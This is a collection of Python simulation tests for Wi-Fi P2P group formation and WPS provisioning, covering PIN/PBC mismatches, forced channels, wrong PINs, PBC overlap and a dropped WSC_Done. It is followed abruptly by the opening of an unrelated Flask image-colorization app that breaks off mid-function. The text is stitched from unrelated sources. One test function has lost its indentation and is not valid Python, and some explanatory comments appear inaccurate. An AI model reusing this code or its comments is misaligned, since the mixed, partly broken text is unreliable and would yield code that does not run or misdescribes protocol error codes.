def test_both_go_neg_enter(dev):
    """P2P GO Negotiation with both devices trying to enter PIN"""
    go_neg_pin_authorized(i_dev=dev[0], r_dev=dev[1], expect_failure=True, i_go_neg_status=10, i_method='enter', r_method='enter')
def test_go_neg_pbc_vs_pin(dev):
    """P2P GO Negotiation with one device using PBC and the other PIN"""
    addr0 = dev[0].p2p_dev_addr()
    addr1 = dev[1].p2p_dev_addr()
    dev[1].p2p_listen()
    if not dev[0].discover_peer(addr1):
        raise Exception("Could not discover peer")
    dev[0].p2p_listen()
    if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " pbc auth"):
        raise Exception("Failed to authorize GO Neg")
    if not dev[1].discover_peer(addr0):
        raise Exception("Could not discover peer")
    if "OK" not in dev[1].request("P2P_CONNECT " + addr0 + " 12345670 display"):
        raise Exception("Failed to initiate GO Neg")
    # Mismatched provisioning methods: expect failure with status 10.
    ev = dev[1].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=10)
    if ev is None:
        raise Exception("GO Negotiation failure timed out")
    if "status=10" not in ev:
        raise Exception("Unexpected failure reason: " + ev)
def test_go_neg_pin_vs_pbc(dev):
    """P2P GO Negotiation with one device using PIN and the other PBC"""
    # Same as above with the method roles swapped.
    addr0 = dev[0].p2p_dev_addr()
    addr1 = dev[1].p2p_dev_addr()
    dev[1].p2p_listen()
    if not dev[0].discover_peer(addr1):
        raise Exception("Could not discover peer")
    dev[0].p2p_listen()
    if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " 12345670 display auth"):
        raise Exception("Failed to authorize GO Neg")
    if not dev[1].discover_peer(addr0):
        raise Exception("Could not discover peer")
    if "OK" not in dev[1].request("P2P_CONNECT " + addr0 + " pbc"):
        raise Exception("Failed to initiate GO Neg")
    ev = dev[1].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=10)
    if ev is None:
        raise Exception("GO Negotiation failure timed out")
    if "status=10" not in ev:
        raise Exception("Unexpected failure reason: " + ev)
def test_grpform_per_sta_psk(dev):
    """P2P group formation with per-STA PSKs"""
    dev[0].request("P2P_SET per_sta_psk 1")
    [i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
    check_grpform_results(i_res, r_res)
    # Join a second client and verify it gets a different PSK.
    pin = dev[2].wps_read_pin()
    dev[0].p2p_go_authorize_client(pin)
    c_res = dev[2].p2p_connect_group(dev[0].p2p_dev_addr(), pin, timeout=60)
    check_grpform_results(i_res, c_res)
    if r_res['psk'] == c_res['psk']:
        raise Exception("Same PSK assigned for both clients")
    hwsim_utils.test_connectivity_p2p(dev[1], dev[2])
    dev[0].remove_group()
    dev[1].wait_go_ending_session()
    dev[2].wait_go_ending_session()
def test_grpform_per_sta_psk_wps(dev):
    """P2P group formation with per-STA PSKs with non-P2P WPS STA"""
    dev[0].request("P2P_SET per_sta_psk 1")
    [i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15, r_dev=dev[1], r_intent=0)
    check_grpform_results(i_res, r_res)
    # A plain WPS station (dev[2]) joins the GO via push-button.
    dev[0].p2p_go_authorize_client_pbc()
    dev[2].request("WPS_PBC")
    dev[2].wait_connected(timeout=30)
    hwsim_utils.test_connectivity_p2p_sta(dev[1], dev[2])
    dev[0].remove_group()
    dev[2].request("DISCONNECT")
    dev[1].wait_go_ending_session()
def test_grpform_force_chan_go(dev):
    """P2P group formation forced channel selection by GO"""
    # Initiator (GO, intent 15) forces operation on 2432 MHz (channel 5).
    [i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
                                           i_freq=2432,
                                           r_dev=dev[1], r_intent=0,
                                           test_data=False)
    check_grpform_results(i_res, r_res)
    if i_res['freq'] != "2432":
        raise Exception("Unexpected channel - did not follow GO's forced channel")
    remove_group(dev[0], dev[1])
def test_grpform_force_chan_cli(dev):
"""P2P group formation forced channel selection by client"""
[i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
i_freq=2417,
r_dev=dev[1], r_intent=15,
test_data=False)
check_grpform_results(i_res, r_res)
if i_res['freq'] != "2417":
raise Exception("Unexpected channel - did not follow GO's forced channel")
remove_group(dev[0], dev[1])
def test_grpform_force_chan_conflict(dev):
"""P2P group formation fails due to forced channel mismatch"""
go_neg_pin_authorized(i_dev=dev[0], i_intent=0, i_freq=2422,
r_dev=dev[1], r_intent=15, r_freq=2427,
expect_failure=True, i_go_neg_status=7)
def test_grpform_pref_chan_go(dev):
    """P2P group formation preferred channel selection by GO"""
    # p2p_pref_chan 81:7 = operating class 81, channel 7 (2442 MHz).
    dev[0].request("SET p2p_pref_chan 81:7")
    [i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
                                           r_dev=dev[1], r_intent=0,
                                           test_data=False)
    check_grpform_results(i_res, r_res)
    if i_res['freq'] != "2442":
        raise Exception("Unexpected channel - did not follow GO's p2p_pref_chan")
    remove_group(dev[0], dev[1])
def test_grpform_pref_chan_go_overridden(dev):
    """P2P group formation preferred channel selection by GO overridden by client"""
    # The client's forced i_freq must win over the GO's preferred channel.
    dev[1].request("SET p2p_pref_chan 81:7")
    [i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
                                           i_freq=2422,
                                           r_dev=dev[1], r_intent=15,
                                           test_data=False)
    check_grpform_results(i_res, r_res)
    if i_res['freq'] != "2422":
        raise Exception("Unexpected channel - did not follow client's forced channel")
    remove_group(dev[0], dev[1])
def test_grpform_no_go_freq_forcing_chan(dev):
    """P2P group formation with no-GO freq forcing channel"""
    # Disallow a wide frequency range (including all 5 GHz) on the GO side;
    # group must end up on a 2.4 GHz channel.
    dev[1].request("SET p2p_no_go_freq 100-200,300,4000-6000")
    [i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
                                           r_dev=dev[1], r_intent=15,
                                           test_data=False)
    check_grpform_results(i_res, r_res)
    if int(i_res['freq']) > 4000:
        raise Exception("Unexpected channel - did not follow no-GO freq")
    remove_group(dev[0], dev[1])
def test_grpform_no_go_freq_conflict(dev):
    """P2P group formation fails due to no-GO range forced by client"""
    # Client forces 2422 MHz while the GO forbids the whole 2.4 GHz band:
    # expect GO Negotiation failure status 7 (no common channels).
    dev[1].request("SET p2p_no_go_freq 2000-3000")
    go_neg_pin_authorized(i_dev=dev[0], i_intent=0, i_freq=2422,
                          r_dev=dev[1], r_intent=15,
                          expect_failure=True, i_go_neg_status=7)
def test_grpform_no_5ghz_world_roaming(dev):
    """P2P group formation with world roaming regulatory"""
    # Under world roaming rules 5 GHz is passive-scan only, so the group must
    # be formed on a 2.4 GHz channel (< 4000 MHz).
    [i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
                                           r_dev=dev[1], r_intent=15,
                                           test_data=False)
    check_grpform_results(i_res, r_res)
    if int(i_res['freq']) > 4000:
        raise Exception("Unexpected channel - did not follow world roaming rules")
    remove_group(dev[0], dev[1])
def test_grpform_no_5ghz_add_cli(dev):
    """P2P group formation with passive scan 5 GHz and p2p_add_cli_chan=1"""
    # p2p_add_cli_chan adds passive-scan channels as client-only candidates;
    # the four variants below differ only in the GO intent split.
    dev[0].request("SET p2p_add_cli_chan 1")
    dev[1].request("SET p2p_add_cli_chan 1")
    [i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
                                           r_dev=dev[1], r_intent=14,
                                           test_data=False)
    check_grpform_results(i_res, r_res)
    if int(i_res['freq']) > 4000:
        raise Exception("Unexpected channel - did not follow world roaming rules")
    remove_group(dev[0], dev[1])
def test_grpform_no_5ghz_add_cli2(dev):
    """P2P group formation with passive scan 5 GHz and p2p_add_cli_chan=1 (reverse)"""
    dev[0].request("SET p2p_add_cli_chan 1")
    dev[1].request("SET p2p_add_cli_chan 1")
    [i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=14,
                                           r_dev=dev[1], r_intent=0,
                                           test_data=False)
    check_grpform_results(i_res, r_res)
    if int(i_res['freq']) > 4000:
        raise Exception("Unexpected channel - did not follow world roaming rules")
    remove_group(dev[0], dev[1])
def test_grpform_no_5ghz_add_cli3(dev):
    """P2P group formation with passive scan 5 GHz and p2p_add_cli_chan=1 (intent 15)"""
    dev[0].request("SET p2p_add_cli_chan 1")
    dev[1].request("SET p2p_add_cli_chan 1")
    [i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=0,
                                           r_dev=dev[1], r_intent=15,
                                           test_data=False)
    check_grpform_results(i_res, r_res)
    if int(i_res['freq']) > 4000:
        raise Exception("Unexpected channel - did not follow world roaming rules")
    remove_group(dev[0], dev[1])
def test_grpform_no_5ghz_add_cli4(dev):
    """P2P group formation with passive scan 5 GHz and p2p_add_cli_chan=1 (reverse; intent 15)"""
    dev[0].request("SET p2p_add_cli_chan 1")
    dev[1].request("SET p2p_add_cli_chan 1")
    [i_res, r_res] = go_neg_pin_authorized(i_dev=dev[0], i_intent=15,
                                           r_dev=dev[1], r_intent=0,
                                           test_data=False)
    check_grpform_results(i_res, r_res)
    if int(i_res['freq']) > 4000:
        raise Exception("Unexpected channel - did not follow world roaming rules")
    remove_group(dev[0], dev[1])
def test_grpform_incorrect_pin(dev):
    """P2P GO Negotiation with incorrect PIN"""
    dev[1].p2p_listen()
    addr1 = dev[1].p2p_dev_addr()
    if not dev[0].discover_peer(addr1):
        raise Exception("Peer not found")
    # dev[1] generates the real PIN; dev[0] deliberately enters 00000000 so
    # GO Negotiation succeeds but WPS provisioning must fail.
    res = dev[1].request("P2P_CONNECT " + dev[0].p2p_dev_addr() + " pin auth go_intent=0")
    if "FAIL" in res:
        raise Exception("P2P_CONNECT failed to generate PIN")
    logger.info("PIN from P2P_CONNECT: " + res)
    dev[0].request("P2P_CONNECT " + addr1 + " 00000000 enter go_intent=15")
    ev = dev[0].wait_global_event(["P2P-GO-NEG-SUCCESS"], timeout=15)
    if ev is None:
        raise Exception("GO Negotiation did not complete successfully(0)")
    ev = dev[1].wait_global_event(["P2P-GO-NEG-SUCCESS"], timeout=15)
    if ev is None:
        raise Exception("GO Negotiation did not complete successfully(1)")
    # config_error=18 is the WPS "Device busy"/PIN mismatch failure code
    # expected for a wrong PIN (msg=8 = WSC_NACK context).
    ev = dev[1].wait_event(["WPS-FAIL"], timeout=15)
    if ev is None:
        raise Exception("WPS failure not reported(1)")
    if "msg=8 config_error=18" not in ev:
        raise Exception("Unexpected WPS failure(1): " + ev)
    ev = dev[0].wait_event(["WPS-FAIL"], timeout=15)
    if ev is None:
        raise Exception("WPS failure not reported")
    if "msg=8 config_error=18" not in ev:
        raise Exception("Unexpected WPS failure: " + ev)
    ev = dev[1].wait_event(["P2P-GROUP-FORMATION-FAILURE"], timeout=10)
    if ev is None:
        raise Exception("Group formation failure timed out")
    ev = dev[0].wait_event(["P2P-GROUP-FORMATION-FAILURE"], timeout=5)
    if ev is None:
        raise Exception("Group formation failure timed out")
def test_grpform_reject(dev):
    """User rejecting group formation attempt by a P2P peer"""
    addr0 = dev[0].p2p_dev_addr()
    dev[0].p2p_listen()
    dev[1].p2p_go_neg_init(addr0, None, "pbc")
    ev = dev[0].wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=15)
    if ev is None:
        raise Exception("GO Negotiation timed out")
    # Invalid peer address must be rejected by the control interface.
    if "OK" in dev[0].global_request("P2P_REJECT foo"):
        raise Exception("Invalid P2P_REJECT accepted")
    # ev format: "P2P-GO-NEG-REQUEST <peer addr> ..." - reject that peer.
    if "FAIL" in dev[0].global_request("P2P_REJECT " + ev.split(' ')[1]):
        raise Exception("P2P_REJECT failed")
    dev[1].request("P2P_STOP_FIND")
    # A retry from the rejected peer must now fail with status 11
    # (rejected by user).
    dev[1].p2p_go_neg_init(addr0, None, "pbc")
    ev = dev[1].wait_global_event(["GO-NEG-FAILURE"], timeout=10)
    if ev is None:
        raise Exception("Rejection not reported")
    if "status=11" not in ev:
        raise Exception("Unexpected status code in rejection")
def test_grpform_pd_no_probe_resp(dev):
    """GO Negotiation after PD, but no Probe Response"""
    addr0 = dev[0].p2p_dev_addr()
    addr1 = dev[1].p2p_dev_addr()
    dev[0].p2p_listen()
    if not dev[1].discover_peer(addr0):
        raise Exception("Peer not found")
    dev[1].p2p_stop_find()
    dev[0].p2p_stop_find()
    # At this point the listen frequency has been learned from the peer's
    # Probe Request during discovery.
    peer = dev[0].get_peer(addr1)
    if peer['listen_freq'] == '0':
        raise Exception("Peer listen frequency not learned from Probe Request")
    time.sleep(0.3)
    # Flush the peer table so the frequency has to be re-learned.
    dev[0].request("P2P_FLUSH")
    dev[0].p2p_listen()
    dev[1].global_request("P2P_PROV_DISC " + addr0 + " display")
    ev = dev[0].wait_global_event(["P2P-PROV-DISC-SHOW-PIN"], timeout=5)
    if ev is None:
        raise Exception("PD Request timed out")
    ev = dev[1].wait_global_event(["P2P-PROV-DISC-ENTER-PIN"], timeout=5)
    if ev is None:
        raise Exception("PD Response timed out")
    # PD alone (without a Probe Response) must not set listen_freq.
    peer = dev[0].get_peer(addr1)
    if peer['listen_freq'] != '0':
        raise Exception("Peer listen frequency learned unexpectedly from PD Request")
    pin = dev[0].wps_read_pin()
    if "FAIL" in dev[1].request("P2P_CONNECT " + addr0 + " " + pin + " enter"):
        raise Exception("P2P_CONNECT on initiator failed")
    ev = dev[0].wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=5)
    if ev is None:
        raise Exception("GO Negotiation start timed out")
    # The GO Negotiation Request frame does provide the listen frequency.
    peer = dev[0].get_peer(addr1)
    if peer['listen_freq'] == '0':
        raise Exception("Peer listen frequency not learned from PD followed by GO Neg Req")
    if "FAIL" in dev[0].request("P2P_CONNECT " + addr1 + " " + pin + " display"):
        raise Exception("P2P_CONNECT on responder failed")
    ev = dev[0].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
    if ev is None:
        raise Exception("Group formation timed out")
    ev = dev[1].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
    if ev is None:
        raise Exception("Group formation timed out")
def test_go_neg_two_peers(dev):
    """P2P GO Negotiation rejected due to already started negotiation with another peer"""
    addr0 = dev[0].p2p_dev_addr()
    addr1 = dev[1].p2p_dev_addr()
    addr2 = dev[2].p2p_dev_addr()
    dev[1].p2p_listen()
    dev[2].p2p_listen()
    if not dev[0].discover_peer(addr1):
        raise Exception("Could not discover peer")
    if not dev[0].discover_peer(addr2):
        raise Exception("Could not discover peer")
    # dev[0] authorizes dev[2] but then actively negotiates with dev[1].
    if "OK" not in dev[0].request("P2P_CONNECT " + addr2 + " pbc auth"):
        raise Exception("Failed to authorize GO Neg")
    dev[0].p2p_listen()
    if not dev[2].discover_peer(addr0):
        raise Exception("Could not discover peer")
    if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " pbc"):
        raise Exception("Failed to initiate GO Neg")
    ev = dev[1].wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=5)
    if ev is None:
        raise Exception("timeout on GO Neg RX event")
    # While the dev[0]<->dev[1] negotiation is pending, dev[2]'s attempt
    # must be rejected with status 5 (unable to accommodate request).
    dev[2].request("P2P_CONNECT " + addr0 + " pbc")
    ev = dev[2].wait_global_event(["GO-NEG-FAILURE"], timeout=10)
    if ev is None:
        raise Exception("Rejection not reported")
    if "status=5" not in ev:
        raise Exception("Unexpected status code in rejection: " + ev)
def clear_pbc_overlap(dev, ifname):
    """Tear down the overlap-test AP and reset both devices' P2P/scan state."""
    hapd_global = hostapd.HostapdGlobal()
    hapd_global.remove(ifname)
    dev[0].request("P2P_CANCEL")
    dev[1].request("P2P_CANCEL")
    dev[0].p2p_stop_find()
    dev[1].p2p_stop_find()
    dev[0].dump_monitor()
    dev[1].dump_monitor()
    # Short settle delays around the scan-cache flushes so stale BSS entries
    # from the removed AP do not leak into the next test case.
    time.sleep(0.1)
    dev[0].flush_scan_cache()
    dev[1].flush_scan_cache()
    time.sleep(0.1)
def test_grpform_pbc_overlap(dev, apdev):
    """P2P group formation during PBC overlap"""
    # Bring up a WPS AP with PBC active to create the overlap condition.
    params = { "ssid": "wps", "eap_server": "1", "wps_state": "1" }
    hapd = hostapd.add_ap(apdev[0]['ifname'], params)
    hapd.request("WPS_PBC")
    time.sleep(0.1)
    # Since P2P Client scan case is now optimized to use a specific SSID, the
    # WPS AP will not reply to that and the scan after GO Negotiation can quite
    # likely miss the AP due to dwell time being short enough to miss the Beacon
    # frame. This has made the test case somewhat pointless, but keep it here
    # for now with an additional scan to confirm that PBC detection works if
    # there is a BSS entry for an overlapping AP.
    for i in range(0, 5):
        dev[0].scan(freq="2412")
        if dev[0].get_bss(apdev[0]['bssid']) is not None:
            break
    addr0 = dev[0].p2p_dev_addr()
    addr1 = dev[1].p2p_dev_addr()
    dev[0].p2p_listen()
    if not dev[1].discover_peer(addr0):
        raise Exception("Could not discover peer")
    dev[1].p2p_listen()
    if not dev[0].discover_peer(addr1):
        raise Exception("Could not discover peer")
    dev[0].p2p_listen()
    if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " pbc auth go_intent=0"):
        raise Exception("Failed to authorize GO Neg")
    if "OK" not in dev[1].request("P2P_CONNECT " + addr0 + " pbc go_intent=15 freq=2412"):
        raise Exception("Failed to initiate GO Neg")
    # The client (dev[0]) must detect two active PBC registrars and abort.
    ev = dev[0].wait_global_event(["WPS-OVERLAP-DETECTED"], timeout=15)
    if ev is None:
        raise Exception("PBC overlap not reported")
    clear_pbc_overlap(dev, apdev[0]['ifname'])
def test_grpform_pbc_overlap_group_iface(dev, apdev):
    """P2P group formation during PBC overlap using group interfaces"""
    # Note: Need to include P2P IE from the AP to get the P2P interface BSS
    # update use this information.
    params = { "ssid": "wps", "eap_server": "1", "wps_state": "1",
               "beacon_int": "15", 'manage_p2p': '1' }
    hapd = hostapd.add_ap(apdev[0]['ifname'], params)
    hapd.request("WPS_PBC")
    # Force use of a separate group interface on both devices.
    dev[0].request("SET p2p_no_group_iface 0")
    dev[1].request("SET p2p_no_group_iface 0")
    addr0 = dev[0].p2p_dev_addr()
    addr1 = dev[1].p2p_dev_addr()
    dev[0].p2p_listen()
    if not dev[1].discover_peer(addr0):
        raise Exception("Could not discover peer")
    dev[1].p2p_listen()
    if not dev[0].discover_peer(addr1):
        raise Exception("Could not discover peer")
    dev[0].p2p_stop_find()
    dev[0].scan(freq="2412")
    dev[0].p2p_listen()
    if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " pbc auth go_intent=0"):
        raise Exception("Failed to authorize GO Neg")
    if "OK" not in dev[1].request("P2P_CONNECT " + addr0 + " pbc go_intent=15 freq=2412"):
        raise Exception("Failed to initiate GO Neg")
    ev = dev[0].wait_global_event(["WPS-OVERLAP-DETECTED",
                                   "P2P-GROUP-FORMATION-SUCCESS"], timeout=15)
    if ev is None or "WPS-OVERLAP-DETECTED" not in ev:
        # Do not report this as failure since the P2P group formation case
        # using a separate group interface has limited chances of "seeing" the
        # overlapping AP due to a per-SSID scan and no prior scan operations on
        # the group interface.
        logger.info("PBC overlap not reported")
    clear_pbc_overlap(dev, apdev[0]['ifname'])
def test_grpform_goneg_fail_with_group_iface(dev):
    """P2P group formation fails while using group interface"""
    dev[0].request("SET p2p_no_group_iface 0")
    dev[1].p2p_listen()
    peer = dev[1].p2p_dev_addr()
    if not dev[0].discover_peer(peer):
        raise Exception("Peer " + peer + " not found")
    # Pre-reject dev[0] so the subsequent negotiation is guaranteed to fail
    # after the dedicated group interface has already been created.
    if "OK" not in dev[1].request("P2P_REJECT " + dev[0].p2p_dev_addr()):
        raise Exception("P2P_REJECT failed")
    if "OK" not in dev[0].request("P2P_CONNECT " + peer + " pbc"):
        raise Exception("P2P_CONNECT failed")
    ev = dev[0].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=10)
    if ev is None:
        raise Exception("GO Negotiation failure timed out")
def test_grpform_cred_ready_timeout(dev, apdev, params):
    """P2P GO Negotiation wait for credentials to become ready [long]"""
    if not params['long']:
        raise HwsimSkip("Skip test case with long duration due to --long not specified")
    dev[1].p2p_listen()
    addr1 = dev[1].p2p_dev_addr()
    if not dev[0].discover_peer(addr1):
        raise Exception("Peer " + addr1 + " not found")
    if not dev[2].discover_peer(addr1):
        raise Exception("Peer " + addr1 + " not found(2)")
    # os.times()[4] is wall-clock elapsed time; used to measure how long the
    # negotiation attempt waits before giving up (expected >= 120 s).
    start = os.times()[4]
    cmd = "P2P_CONNECT " + addr1 + " 12345670 display"
    if "OK" not in dev[0].global_request(cmd):
        raise Exception("Failed to initiate GO Neg")
    if "OK" not in dev[2].global_request(cmd):
        raise Exception("Failed to initiate GO Neg(2)")
    # First, check with p2p_find
    ev = dev[2].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=30)
    if ev is not None:
        raise Exception("Too early GO Negotiation timeout reported(2)")
    dev[2].dump_monitor()
    logger.info("Starting p2p_find to change state")
    dev[2].p2p_find()
    ev = dev[2].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=100)
    if ev is None:
        raise Exception("GO Negotiation failure timed out(2)")
    dev[2].dump_monitor()
    end = os.times()[4]
    logger.info("GO Negotiation wait time: {} seconds(2)".format(end - start))
    if end - start < 120:
        raise Exception("Too short GO Negotiation wait time(2): {}".format(end - start))
    # Verify that device discovery still works after the failure.
    wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
    wpas.interface_add("wlan5")
    wpas.p2p_listen()
    ev = dev[2].wait_global_event(["P2P-DEVICE-FOUND"], timeout=10)
    if ev is None:
        raise Exception("Did not discover new device after GO Negotiation failure")
    if wpas.p2p_dev_addr() not in ev:
        raise Exception("Unexpected device found: " + ev)
    dev[2].p2p_stop_find()
    wpas.p2p_stop_find()
    # Finally, verify without p2p_find
    ev = dev[0].wait_global_event(["P2P-GO-NEG-FAILURE"], timeout=120)
    if ev is None:
        raise Exception("GO Negotiation failure timed out")
    end = os.times()[4]
    logger.info("GO Negotiation wait time: {} seconds".format(end - start))
    if end - start < 120:
        raise Exception("Too short GO Negotiation wait time: {}".format(end - start))
def test_grpform_no_wsc_done(dev):
    """P2P group formation with WSC-Done not sent"""
    addr0 = dev[0].p2p_dev_addr()
    addr1 = dev[1].p2p_dev_addr()
    # Run twice to confirm the recovery path works back-to-back.
    for i in range(0, 2):
        # Route EAPOL frames through the control interface so the test can
        # inspect and selectively drop them.
        dev[0].request("SET ext_eapol_frame_io 1")
        dev[1].request("SET ext_eapol_frame_io 1")
        dev[0].p2p_listen()
        dev[1].p2p_go_neg_auth(addr0, "12345670", "display", 0)
        dev[1].p2p_listen()
        dev[0].p2p_go_neg_init(addr1, "12345670", "enter", timeout=20,
                               go_intent=15, wait_group=False)
        mode = None
        while True:
            ev = dev[0].wait_event(["EAPOL-TX"], timeout=15)
            if ev is None:
                raise Exception("Timeout on EAPOL-TX from GO")
            if not mode:
                mode = dev[0].get_status_field("mode")
            res = dev[1].request("EAPOL_RX " + addr0 + " " + ev.split(' ')[2])
            if "OK" not in res:
                raise Exception("EAPOL_RX failed")
            ev = dev[1].wait_event(["EAPOL-TX"], timeout=15)
            if ev is None:
                raise Exception("Timeout on EAPOL-TX from P2P Client")
            msg = ev.split(' ')[2]
            # 102200010f is the WSC Message Type attribute for WSC_Done.
            if msg[46:56] == "102200010f":
                logger.info("Drop WSC_Done")
                dev[0].request("SET ext_eapol_frame_io 0")
                dev[1].request("SET ext_eapol_frame_io 0")
                # Fake EAP-Failure to complete session on the client
                id = msg[10:12]
                dev[1].request("EAPOL_RX " + addr0 + " 0300000404" + id + "0004")
                break
            res = dev[0].request("EAPOL_RX " + addr1 + " " + msg)
            if "OK" not in res:
                raise Exception("EAPOL_RX failed")
        # Group formation must still complete even though WSC_Done was lost.
        ev = dev[0].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
        if ev is None:
            raise Exception("Group formation timed out on GO")
        ev = dev[1].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
        if ev is None:
            raise Exception("Group formation timed out on P2P Client")
        dev[0].remove_group()
        if mode != "P2P GO - group formation":
            raise Exception("Unexpected mode on GO during group formation: " + mode)
def test_grpform_wait_peer(dev):
    """P2P group formation wait for peer to become ready"""
    addr0 = dev[0].p2p_dev_addr()
    addr1 = dev[1].p2p_dev_addr()
    dev[1].p2p_listen()
    if not dev[0].discover_peer(addr1):
        raise Exception("Peer " + addr1 + " not found")
    # extra_roc_dur extends remain-on-channel periods so dev[0] keeps waiting
    # for the (intentionally slow) peer to accept the connection.
    dev[0].request("SET extra_roc_dur 500")
    if "OK" not in dev[0].request("P2P_CONNECT " + addr1 + " 12345670 display go_intent=15"):
        raise Exception("Failed to initiate GO Neg")
    time.sleep(3)
    dev[1].request("P2P_CONNECT " + addr0 + " 12345670 enter go_intent=0")
    ev = dev[0].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
    if ev is None:
        raise Exception("Group formation timed out")
    dev[0].request("SET extra_roc_dur 0")
    ev = dev[1].wait_global_event(["P2P-GROUP-STARTED"], timeout=15)
    if ev is None:
        raise Exception("Group formation timed out")
    dev[0].remove_group()
def test_invalid_p2p_connect_command(dev):
    """P2P_CONNECT error cases"""
    # A plain (non-persistent-group) network id to exercise persistent=<id>
    # validation below.
    id = dev[0].add_network()
    for cmd in [ "foo",
                 "00:11:22:33:44:55",
                 "00:11:22:33:44:55 pbc persistent=123",
                 "00:11:22:33:44:55 pbc persistent=%d" % id,
                 "00:11:22:33:44:55 pbc go_intent=-1",
                 "00:11:22:33:44:55 pbc go_intent=16",
                 "00:11:22:33:44:55 pin",
                 "00:11:22:33:44:55 pbc freq=0" ]:
        if "FAIL" not in dev[0].request("P2P_CONNECT " + cmd):
            raise Exception("Invalid P2P_CONNECT command accepted: " + cmd)
    # 1234567 fails the WPS PIN checksum and must produce a distinct error.
    if "FAIL-INVALID-PIN" not in dev[0].request("P2P_CONNECT 00:11:22:33:44:55 1234567"):
        raise Exception("Invalid PIN was not rejected")
    if "FAIL-CHANNEL-UNSUPPORTED" not in dev[0].request("P2P_CONNECT 00:11:22:33:44:55 pin freq=3000"):
        raise Exception("Unsupported channel not reported")
def test_p2p_unauthorize(dev):
    """P2P_UNAUTHORIZE to unauthorize a peer"""
    if "FAIL" not in dev[0].request("P2P_UNAUTHORIZE foo"):
        raise Exception("Invalid P2P_UNAUTHORIZE accepted")
    if "FAIL" not in dev[0].request("P2P_UNAUTHORIZE 00:11:22:33:44:55"):
        raise Exception("P2P_UNAUTHORIZE for unknown peer accepted")
    addr0 = dev[0].p2p_dev_addr()
    addr1 = dev[1].p2p_dev_addr()
    dev[1].p2p_listen()
    pin = dev[0].wps_read_pin()
    # Authorize the peer, then immediately revoke the authorization.
    dev[0].p2p_go_neg_auth(addr1, pin, "display")
    dev[0].p2p_listen()
    if "OK" not in dev[0].request("P2P_UNAUTHORIZE " + addr1):
        raise Exception("P2P_UNAUTHORIZE failed")
    # After unauthorization the incoming attempt must show up as a fresh
    # GO Negotiation Request instead of proceeding automatically.
    dev[1].p2p_go_neg_init(addr0, pin, "keypad", timeout=0)
    ev = dev[0].wait_global_event(["P2P-GO-NEG-REQUEST"], timeout=10)
    if ev is None:
        raise Exception("No GO Negotiation Request RX reported")
def test_grpform_pbc_multiple(dev):
    """P2P group formation using PBC multiple times in a row"""
    try:
        # Passive scanning on dev[1] makes repeated discovery more demanding.
        dev[1].request("SET passive_scan 1")
        for i in range(5):
            [i_res, r_res] = go_neg_pbc_authorized(i_dev=dev[0], i_intent=15,
                                                   r_dev=dev[1], r_intent=0)
            remove_group(dev[0], dev[1])
    finally:
        # Always restore active scanning for the following test cases.
        dev[1].request("SET passive_scan 0")
        dev[1].flush_scan_cache()
|
app.py | from queue import Empty, Queue
import threading, time, uuid, os
from flask import (
Flask, send_file, request, Response, render_template,
)
import torch
from data import colorize_image as CI
from skimage import color as skiColor
import numpy as np
from io import BytesIO
from PIL import Image, ImageColor
# Load the interactive colorization model once at import time; all requests
# share this single instance via the batch worker thread.
colorModel = CI.ColorizeImageTorch(Xd=256)
# Use GPU 0 when CUDA is available, otherwise run on CPU (gpu_id=None).
gpu_id = 0 if torch.cuda.is_available() else None
colorModel.prep_net(gpu_id=gpu_id, path='./models/pytorch/caffemodel.pth')
app = Flask(__name__)
# Incoming requests are queued here and consumed by handle_requests_by_batch.
requestsQueue = Queue()
# Number of queued requests processed per batch iteration.
BATCH_SIZE = 1
# Seconds between queue polls (both in the worker and the request handler).
CHECK_INTERVAL = 0.1
def handle_requests_by_batch():
    """Background worker: drain the request queue and run the model serially.

    Each queued item is a dict whose 'input' is [file, labArr, position]; the
    colorized result (a BytesIO, or the string "error") is stored under
    'output', which the route handler polls for.
    """
    while True:
        batch = []
        # Block until BATCH_SIZE requests have been collected.
        while len(batch) < BATCH_SIZE:
            try:
                batch.append(requestsQueue.get(timeout=CHECK_INTERVAL))
            except Empty:
                continue
        # BUG FIX: the loop variable used to be named `request`, shadowing the
        # flask.request import inside this module.
        for job in batch:
            job['output'] = run(job['input'][0], job['input'][1], job['input'][2])
threading.Thread(target=handle_requests_by_batch).start()
def put_point(inputAb, mask, loc, p, val):
    """Paint a (2p+1)x(2p+1) square color hint and mark it in the mask.

    inputAb: (2, H, W) array of ab color channels, modified in place.
    mask:    (1, H, W) array, set to 1 where the hint was placed.
    loc:     [row, col] center of the square.
    p:       half-width of the painted square.
    val:     [a, b] color value written to both channels.
    Returns the (inputAb, mask) pair.
    """
    rows = slice(loc[0] - p, loc[0] + p + 1)
    cols = slice(loc[1] - p, loc[1] + p + 1)
    inputAb[:, rows, cols] = np.array(val)[:, np.newaxis, np.newaxis]
    mask[:, rows, cols] = 1
    return (inputAb, mask)
def run(file, labArr, position):
    """Colorize an uploaded grayscale image with a single user color hint.

